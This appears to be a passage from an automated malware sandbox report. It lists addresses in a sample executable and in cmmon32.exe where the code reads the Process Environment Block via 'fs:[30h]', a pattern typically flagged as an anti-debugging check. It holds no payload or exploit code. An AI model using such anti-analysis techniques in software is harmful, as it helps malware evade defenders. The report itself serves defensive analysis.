          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]1_2_009BC577
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]1_2_009BC577
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]1_2_00A60EA5
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]1_2_00A146A7
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]1_2_00A2FE87
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]1_2_009C36CC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]1_2_009D8EC7
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A4FEC0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]1_2_00A68ED6
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]1_2_009A76E2
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]1_2_009C16E0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]1_2_009CA61C
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]1_2_009CA61C
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]1_2_0099C600
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]1_2_00A4FE3F
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]1_2_009C8E00
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51608 mov eax, dword ptr fs:[00000030h]1_2_00A51608
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]1_2_0099E620
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]1_2_009A7E41
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]1_2_00A5AE44
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]1_2_00A5AE44
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]1_2_009BAE73
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]1_2_009BAE73
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]1_2_009BAE73
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]1_2_009BAE73
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]1_2_009BAE73
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]1_2_009A766D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A8794 mov eax, dword ptr fs:[00000030h]1_2_009A8794
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]1_2_00A17794
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]1_2_00A17794
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]1_2_00A17794
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D37F5 mov eax, dword ptr fs:[00000030h]1_2_009D37F5
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BF716 mov eax, dword ptr fs:[00000030h]1_2_009BF716
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]1_2_009CA70E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]1_2_009CA70E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]1_2_009BB73D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]1_2_009BB73D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]1_2_00A6070D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]1_2_00A6070D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]1_2_009CE730
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]1_2_00A2FF10
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]1_2_00A2FF10
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]1_2_00994F2E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]1_2_00994F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA44B mov eax, dword ptr fs:[00000030h]9_2_045AA44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]9_2_0460C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]9_2_0460C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459746D mov eax, dword ptr fs:[00000030h]9_2_0459746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]9_2_045F6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]9_2_045F6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]9_2_045F6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]9_2_045F6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]9_2_04631C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]9_2_0464740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]9_2_0464740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]9_2_0464740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045ABC2C mov eax, dword ptr fs:[00000030h]9_2_045ABC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046314FB mov eax, dword ptr fs:[00000030h]9_2_046314FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]9_2_045F6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]9_2_045F6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]9_2_045F6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648CD6 mov eax, dword ptr fs:[00000030h]9_2_04648CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458849B mov eax, dword ptr fs:[00000030h]9_2_0458849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04597D50 mov eax, dword ptr fs:[00000030h]9_2_04597D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B3D43 mov eax, dword ptr fs:[00000030h]9_2_045B3D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3540 mov eax, dword ptr fs:[00000030h]9_2_045F3540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04623D40 mov eax, dword ptr fs:[00000030h]9_2_04623D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]9_2_0459C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]9_2_0459C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648D34 mov eax, dword ptr fs:[00000030h]9_2_04648D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463E539 mov eax, dword ptr fs:[00000030h]9_2_0463E539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]9_2_045A4D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]9_2_045A4D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]9_2_045A4D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457AD30 mov eax, dword ptr fs:[00000030h]9_2_0457AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045FA537 mov eax, dword ptr fs:[00000030h]9_2_045FA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]9_2_04583D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]9_2_0463FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]9_2_0463FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]9_2_0463FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]9_2_0463FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04628DF1 mov eax, dword ptr fs:[00000030h]9_2_04628DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]9_2_045F6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]9_2_0458D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]9_2_0458D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]9_2_045AFD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]9_2_045AFD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]9_2_046405AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]9_2_046405AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]9_2_04572D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]9_2_04572D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]9_2_04572D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]9_2_04572D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]9_2_04572D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]9_2_045A1DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]9_2_045A1DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]9_2_045A1DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A35A1 mov eax, dword ptr fs:[00000030h]9_2_045A35A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]9_2_04587E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]9_2_0463AE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]9_2_0463AE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]9_2_0459AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]9_2_0459AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]9_2_0459AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]9_2_0459AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]9_2_0459AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458766D mov eax, dword ptr fs:[00000030h]9_2_0458766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]9_2_045AA61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]9_2_045AA61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]9_2_0457C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]9_2_0457C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]9_2_0457C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A8E00 mov eax, dword ptr fs:[00000030h]9_2_045A8E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FE3F mov eax, dword ptr fs:[00000030h]9_2_0462FE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631608 mov eax, dword ptr fs:[00000030h]9_2_04631608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457E620 mov eax, dword ptr fs:[00000030h]9_2_0457E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A36CC mov eax, dword ptr fs:[00000030h]9_2_045A36CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B8EC7 mov eax, dword ptr fs:[00000030h]9_2_045B8EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FEC0 mov eax, dword ptr fs:[00000030h]9_2_0462FEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648ED6 mov eax, dword ptr fs:[00000030h]9_2_04648ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A16E0 mov ecx, dword ptr fs:[00000030h]9_2_045A16E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045876E2 mov eax, dword ptr fs:[00000030h]9_2_045876E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]9_2_04640EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]9_2_04640EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]9_2_04640EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FE87 mov eax, dword ptr fs:[00000030h]9_2_0460FE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F46A7 mov eax, dword ptr fs:[00000030h]9_2_045F46A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648F6A mov eax, dword ptr fs:[00000030h]9_2_04648F6A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458EF40 mov eax, dword ptr fs:[00000030h]9_2_0458EF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458FF60 mov eax, dword ptr fs:[00000030h]9_2_0458FF60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459F716 mov eax, dword ptr fs:[00000030h]9_2_0459F716
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]9_2_045AA70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]9_2_045AA70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]9_2_0459B73D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]9_2_0459B73D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]9_2_0464070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]9_2_0464070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AE730 mov eax, dword ptr fs:[00000030h]9_2_045AE730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]9_2_0460FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]9_2_0460FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]9_2_04574F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]9_2_04574F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B37F5 mov eax, dword ptr fs:[00000030h]9_2_045B37F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]9_2_045F7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]9_2_045F7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]9_2_045F7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04588794 mov eax, dword ptr fs:[00000030h]9_2_04588794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]9_2_04590050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]9_2_04590050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04632073 mov eax, dword ptr fs:[00000030h]9_2_04632073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641074 mov eax, dword ptr fs:[00000030h]9_2_04641074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]9_2_045F7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]9_2_045F7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]9_2_045F7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]9_2_04644015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]9_2_04644015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]9_2_0458B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]9_2_0458B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]9_2_0458B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]9_2_0458B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]9_2_045A002D
